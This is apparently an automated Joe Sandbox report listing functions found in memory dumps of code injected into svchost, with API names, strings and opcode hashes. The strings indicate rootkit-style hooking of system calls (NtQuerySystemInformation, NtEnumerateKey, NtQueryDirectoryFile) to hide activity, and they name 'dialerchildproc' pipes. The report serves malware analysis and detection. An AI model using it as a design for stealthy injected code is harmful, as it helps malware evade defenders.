                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 7a8f22d71641694a9fd7ec0762583f57e8a0a7c965321d3c74b055877a6cee4e
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: F0516C72211B8486EB95CF62FA487AA77E9F389BE9F144124DA4A0772ADF7CC045C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 8747b8a499e9052df40478483ed6c278368860711bb81c5df639d3b7e26418f2
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 7031067462295AA0EB84EF65EF51FD863EEBB05358FD06017940B12176AFF8C249C390

                                                        Control-flow Graph (basic-block graph for the function at 14e255d6910; named nodes: __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c; legend: Executed / Not Executed; edge data omitted)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 2332f7615c00a9b45a6cd8c5de408ca84be1c3b81a06dd6493736303431c435b
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 9681D333E8264386FA509B659E41BD963DDFB87780F6880159A4B877B6DBFCC8478700

                                                        Control-flow Graph (basic-block graph for the function at 14e25edce28; API nodes: GetLastError, FlsGetValue, FlsSetValue, SetLastError; legend: Executed / Not Executed; edge data omitted)
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 0000014E25EDCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCEBC
                                                        • SetLastError.KERNEL32 ref: 0000014E25EDCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,0000014E25EDECCC,?,?,?,?,0000014E25EDBF9F,?,?,?,?,?,0000014E25ED7AB0), ref: 0000014E25EDCF2C
                                                          • Part of subcall function 0000014E25EDD6CC: HeapAlloc.KERNEL32 ref: 0000014E25EDD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF54
                                                          • Part of subcall function 0000014E25EDD744: HeapFree.KERNEL32 ref: 0000014E25EDD75A
                                                          • Part of subcall function 0000014E25EDD744: GetLastError.KERNEL32 ref: 0000014E25EDD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF76
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 0e38215d1457e59afe65eb01ec79511c82aee5c2ce1e14f3d06b2e4fe1cd1a9d
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 69416F7025324485FAE9A7359F51BF962CEBB877F0F142B24A83B466F6DEE984014341

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: f3f1b66307ed9429f7177bedba5dbcb25a8199bf3a3daf748d0c8febe8376095
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 5321307262475082EB50CB25FA4479963E8F7897A4F500215DA5A02BB9CFBCC549CB00

                                                        Control-flow Graph (basic-block graph for the function at 14e255d9944; legend: Executed / Not Executed; edge data omitted)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: b2a34a7c217fcdebc7505ea3e7ea67a3eaa2ec335367fa87b754eea6f7af43be
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: CDE1E573A46B4286EB60DF65DA80BDD77F8F756B98F000115EE4A57BA9CB78C091C700

                                                        Control-flow Graph (basic-block graph for the function at 14e25eda544; legend: Executed / Not Executed; edge data omitted)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: dc5baa9e4900bccee7b18694ed6ad8fc180f2675819547d15587c8c5e04f39b1
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 7FE1D472606B408AEBA0DF65DE40BDD77ECF756B98F102115EE8A57BA9CB78C181C700

                                                        Control-flow Graph
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 22fee92a7b634e20b8207f9d96fbe19373ab9512f5f1e434ffbaebbadbf46c39
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: BA41C432322A1051EA96CF16AE00FE923DDBB46BE0F196129DD1F877A5EEB8C4458301

                                                        Control-flow Graph
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: d53801182b1a1fddabf9b2cb97fa914ecb6b5c17acb5066caa3a10faa4a8568e
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: DE418073214B84C6E7A4CF21E94479E77E9F389B98F148129DB8A07B68DF78C549CB00
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD087
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 67d499ed1cae324e52016772c9b3e2eb920b02c753671c71406fddec84103b65
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 0511633070664441FAE89B359F51BED62CEBB877F0F546324983B066FADEE9C8028301
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: eec92c873ab8a8532cd6d95de1f2b50f3b3f0ee532591f7514190b140d4d18b8
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 20811E71A1224186FBD0AB25AE43FD922DDBB87780F146425AA4B437F7EBF9C841C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 4b673a47d5b222b7fe4c6400c13b60ea41fad0e13ee299185a4e4a279635b7ed
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 4731C731313640E1EEA2DB42AE00FE962DCB759BB0F5916259D1F8B3B5EFB9C5458300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: dac870ae50dc774142f57e224bcde91fef96868b3a026d0ca4bce480cb7abb85
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: D6115E31220B4086E7A18B52F944B5976E8F788FF4F144214EA5F877B5DFB8C5148740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 2d2ae68968ed466a8bd9f8edaa945d4ff509ed3e6404d4b55c90d98096d8e2c2
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 58118E7A321B4082EF949B11F904AA9B3E8F789B94F140028DE8A037A5EF7DC505C704
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: dbf7c04510264e3aa80be77e2b965e56a4bbf761f2bbcec70d3958daf628b150
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 9AD1BA76219B8881DAB09B06E99079A77E8F3C9B84F101116EACE47BB5DF7CC551CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 84f0a49ae497355131a2aac26c953b08be1bccc37f8d4e7dda7159b87278197d
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 5B31C732712B6183EB95CF16EE40BA9A7DDFB45B90F0854249E4A47B76EF75C461C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 471d6bd78421e7f0d323d5dd982a26040bfcc08c4fbacc160c0418542b83e496
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: 05115E3020224481FAE99B219F45BED61CEBB877F0F146724A837467F6DEE988019341
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: ca7a516169cdbcbbb0f1702b00ec33b0ff134d6781b8bdceb78e20af0a0e2d48
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 5F016971710B4082EBA4DB52B948B9963E9F788BD4F984035DE4E43766DF7CC989C700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: cd6817a2b86cb7a5d2c6d38da5d770d31958944fdfcb510b49edaf7ad4408b8a
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: C6012DB5222B4082FFA59B21FD08B9A73E8BB49B96F140528CD4A07775EFBDC1088700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 9b2a1657cc1f5397dbb91559528021781e071057780ce7782a4c857206022f56
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 2751BD327126018AEB94DF15EE48F9837DEF366B98F129524DA47877ACEBB5C841C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: d85250e2fd4da4f793b085a3e5f2ae8afe95a5ea4a6e7ad585896a302fadfb02
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: C431CB3221274086E790DF11ED08B9937ECF356B98F168414EE8B837A9CBB9C940C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: eb17f0113111d357bb3c0c2e1e39b944648b27065071a28b27f10ee0fb883d04
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 6EF0A47271064082EBB08F20FA84B9963A8F74CBA8F944020CA4A46A65DFBCC64DCB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: ae1ffe23413f3f9ac290ddb9a375ecfb0d94467b0eec39550c61245b0545be19
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: FAF0F6B132270581EF508F24F944B9923ACFB89770F601219CA6B051F4DFBCC044C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: a8a97001e52402dc951ae60ecd85aaaa03d7a8c3e915bbc4e21f66f82a1337c1
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 0AF08270324B8082EE908F13BB0459962A9BB8CFE0F185130EE4707B39DFBCC8458700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: f51a204a033d80b8679267c1f31be89dd82c60e0a798355614f27ff34b059d90
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 1102CD32619B8486D7A0CB55F99079AB7F8F3C5794F105016EA8E47B68DFBDC854CB00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: d9fcac21c386e716bf48634b26dfdb2d1c4fc5b9b771d717854196da0f0511ca
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: AD61AC3651AB44C6E7A4CB15E984B5A77E8F389794F102116EA8E47BB8DBBCC950CF00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 963a1978ace91ebc5c95c6f5ace322840b4e8d1a0b49158cfbdd5de4de91675c
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: D011E333EF0A0351FA641128E741BE916C97B59371F7B863AA96B063F6CAF4E8424300
                                                        APIs
                                                        Memory Dump Source
